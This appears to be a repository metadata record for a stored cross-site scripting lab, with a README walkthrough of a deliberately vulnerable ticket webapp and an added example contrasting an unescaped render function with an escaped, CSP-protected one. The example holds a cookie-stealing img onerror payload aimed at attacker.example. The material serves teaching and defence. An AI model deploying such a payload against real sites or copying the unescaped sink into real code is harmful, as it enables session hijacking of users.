{"id":20493859,"url":"https://github.com/qeeqbox/stored-cross-site-scripting","last_synced_at":"2026-02-17T10:36:35.622Z","repository":{"id":104219189,"uuid":"486722717","full_name":"qeeqbox/stored-cross-site-scripting","owner":"qeeqbox","description":"A threat actor may inject malicious content into a vulnerable target","archived":false,"fork":false,"pushed_at":"2025-07-28T00:44:10.000Z","size":1304,"stargazers_count":4,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-09T10:06:51.685Z","etag":null,"topics":["cross","example","infosecsimplified","metadata","qeeqbox","scripting","site","stored","visulization","vulnerability","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/qeeqbox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["qeeqbox"]}},"created_at":"2022-04-28T19:25:42.000Z","updated_at":"2025-07-28T01:03:30.000Z","dependencies_parsed_at":"2025-07-26T23:21:23.735Z","dependency_job_id":null,"html_url":"https://github.com/qeeqbox/stored-cross-site-scripting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/qeeqbox/stored-cross-site-scripting","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit
ories/qeeqbox%2Fstored-cross-site-scripting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/qeeqbox","download_url":"https://codeload.github.com/qeeqbox/stored-cross-site-scripting/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29540188,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T08:11:05.436Z","status":"ssl_error","status_checked_at":"2026-02-17T08:09:38.860Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross","example","infosecsimplified","metadata","qeeqbox","scripting","site","stored","visulization","vulnerability","xss-vulnerability"],"created_at":"2024-11-15T17:37:10.019Z","updated_at":"2026-02-17T10:36:35.588Z","avatar_url":"https://github.com/qeeqbox.png","language":null,"funding_links":["https://github.com/sponsors/qeeqbox"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e \u003cimg 
src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/stored-cross-site-scripting.svg\"\u003e\u003c/p\u003e\n\nAn application enables users to control the Document Object Model (DOM) environment. A threat actor can exploit this feature by injecting a malicious payload into the trusted web application database. When users interact and request resources from the database, their browsers retrieve the payload and then execute it. This vulnerability is reflected in the HTTP(s) response and occurs on the client side. However, the payload is saved on the server-side\n\nClone this current repo recursively\n```sh\ngit clone --recurse-submodules https://github.com/qeeqbox/stored-cross-site-scripting\n```\nRun the webapp using Python\n```sh\npython3 stored-cross-site-scripting/vulnerable-web-app/webapp.py\n```\nOpen the webapp in your browser 127.0.0.1:5142\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/1.png\"\u003e\u003c/p\u003e\nUse the default credentials (username: admin and password: admin) to login\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/2.png\"\u003e\u003c/p\u003e\nA threat actor could embed a malicious payload instead of a ticket\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/3.png\"\u003e\u003c/p\u003e\nWhen the victim logs in (The admin user), the payload will be executed by the broswer \n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/4.png\"\u003e\u003c/p\u003e\nIf you examine the ticket section, you will see the payload there\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/5.png\"\u003e\u003c/p\u003e\n\n## 
Code\nWhen the user adds a ticket to the webapp, the ticket is sent from the user to the webapp using a POST request, the add route is used, and the data is passed to the add_ticket() function\n```py\ndef do_POST(self):\n    ...\n    elif parsed_url.path == \"/add\":\n        self.add_ticket(post_request_data[\"ticket\"][0])\n        self.redirect(URL)\n    ...\n```\nThe add_ticket() function will embed the user value in an SQLite database\n```py\n@logged_in\n@check_access(access=\"ticket\")\ndef add_ticket(self, ticket):\n    with connect(DATABASE, isolation_level=None) as connection:\n        cursor = connection.cursor()\n        cursor.execute(\"INSERT into ticket(username, ticket) values(?,?)\", (self.session[\"username\"], ticket))\n        return True\n    return False\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting/lists"}
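The README above shows the source of the stored XSS (add_ticket() persisting the raw value) but not the sink where that value is rendered back to the admin. The following is an added example, not code from the qeeqbox repository: it reproduces the pattern end to end with an in-memory SQLite table matching the README's ticket(username, ticket) schema, a constructed payload, the vulnerable render function beside its hardened form, and a Content-Security-Policy header as defence in depth. The function names (open_db, render_tickets_vulnerable, render_tickets_safe, csp_header), the HTML template and the attacker.example host are assumptions made for illustration.

```python
"""Stored XSS: vulnerable and hardened rendering of user-supplied tickets.

Added example; not code from the qeeqbox repo. It mirrors the README's flow
(ticket stored raw in SQLite, rendered back to the admin) with an in-memory
database. Function names and the HTML template are assumptions.
"""
import html
import sqlite3

# Constructed sample payload: the kind of value a threat actor would submit
# instead of a ticket. attacker.example is a placeholder host.
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def open_db() -> sqlite3.Connection:
    """In-memory database with the same ticket(username, ticket) table the README shows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ticket (username TEXT, ticket TEXT)")
    return conn


def add_ticket(conn: sqlite3.Connection, username: str, ticket: str) -> None:
    """Parameterised INSERT, like the project's add_ticket(): safe against SQL
    injection, but the value is persisted verbatim, markup included."""
    conn.execute("INSERT INTO ticket(username, ticket) VALUES (?, ?)", (username, ticket))


def render_tickets_vulnerable(conn: sqlite3.Connection) -> str:
    """Sink: concatenates stored tickets straight into HTML, so a stored '<'
    reaches every viewer's browser as a tag."""
    rows = conn.execute("SELECT username, ticket FROM ticket").fetchall()
    items = "".join(f"<li><b>{u}</b>: {t}</li>" for u, t in rows)
    return f"<ul>{items}</ul>"


def render_tickets_safe(conn: sqlite3.Connection) -> str:
    """Same page with contextual output encoding: html.escape(quote=True)
    neutralises <, >, &, double and single quotes for the HTML element
    context used here. The data stays as submitted; only the sink changes."""
    rows = conn.execute("SELECT username, ticket FROM ticket").fetchall()
    items = "".join(
        f"<li><b>{html.escape(u, quote=True)}</b>: {html.escape(t, quote=True)}</li>"
        for u, t in rows
    )
    return f"<ul>{items}</ul>"


def csp_header() -> tuple[str, str]:
    """Defence in depth for the response: a policy without 'unsafe-inline'
    makes the browser refuse inline handlers such as onerror= even if an
    encoding step is missed. It complements escaping, it does not replace it."""
    return (
        "Content-Security-Policy",
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    )


def demo() -> dict:
    """Store one malicious and one benign ticket, render both ways."""
    conn = open_db()
    add_ticket(conn, "attacker", PAYLOAD)
    add_ticket(conn, "alice", "Printer on floor 2 is <broken>")  # benign text containing '<'
    return {
        "vulnerable": render_tickets_vulnerable(conn),
        "safe": render_tickets_safe(conn),
    }


if __name__ == "__main__":
    out = demo()
    print("vulnerable:", out["vulnerable"])
    print("safe:      ", out["safe"])
    print("header:    ", csp_header())
```

The encoder must match the output context: html.escape() is correct for text inside an element, but a value placed into an attribute, a URL, or a script block needs that context's encoding instead. Note also that the benign ticket containing `<broken>` renders fine in the safe version, which is why output encoding at the sink is preferable to rejecting or stripping input at the source.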